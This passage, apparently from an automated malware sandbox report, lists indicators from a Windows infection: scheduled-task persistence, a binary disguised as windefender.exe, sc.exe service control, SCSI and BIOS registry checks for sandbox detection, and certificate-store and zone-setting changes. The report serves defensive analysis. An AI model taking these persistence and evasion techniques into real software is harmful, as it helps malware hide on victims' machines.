C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune 515A.exe File created C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job schtasks.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\rss 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\Tasks\GyWbuVQzPmDmgkCMH.job schtasks.exe File created C:\Windows\Tasks\HKFMMLmWpeGdwIqGl.job schtasks.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe -
Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1100 sc.exe 2668 sc.exe 1988 sc.exe 4208 sc.exe 580 sc.exe 4480 sc.exe 2604 sc.exe 2812 sc.exe 6064 sc.exe 5156 sc.exe 1136 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3848 3908 WerFault.exe AppLaunch.exe 5528 5412 WerFault.exe AppLaunch.exe 3508 4896 WerFault.exe 515A.exe 1600 1364 WerFault.exe ADelRCP.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
toolspub2.exe3Pp48oh.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3Pp48oh.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3Pp48oh.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3Pp48oh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 304 schtasks.exe 3248 schtasks.exe 4192 schtasks.exe 5784 schtasks.exe 4444 schtasks.exe 1012 schtasks.exe 3848 schtasks.exe 1092 schtasks.exe 1804 schtasks.exe 700 schtasks.exe 5492 schtasks.exe 168 schtasks.exe 1000 schtasks.exe 2936 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
rundll32.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Processes:
MicrosoftEdgeCP.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exe31839b57a4f11171d6abc8bbc4451ee4.exewindefender.exevaxPtPs.exepowershell.exepowershell.exereg.exepowershell.exerundll32.exepowershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" vaxPtPs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{45ef689a-0000-0000-0000-d01200000000}\MaxCapacity = "14116" vaxPtPs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2141 = "Transbaikal Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e4478dbdd006da01 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 03c834c8d006da01 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a74782bcd006da01 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8e40c7b6d006da01 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\ClearBrowsingHistoryOnStart = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\ MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f97be1b6d006da01 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8a5376bcd006da01 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created 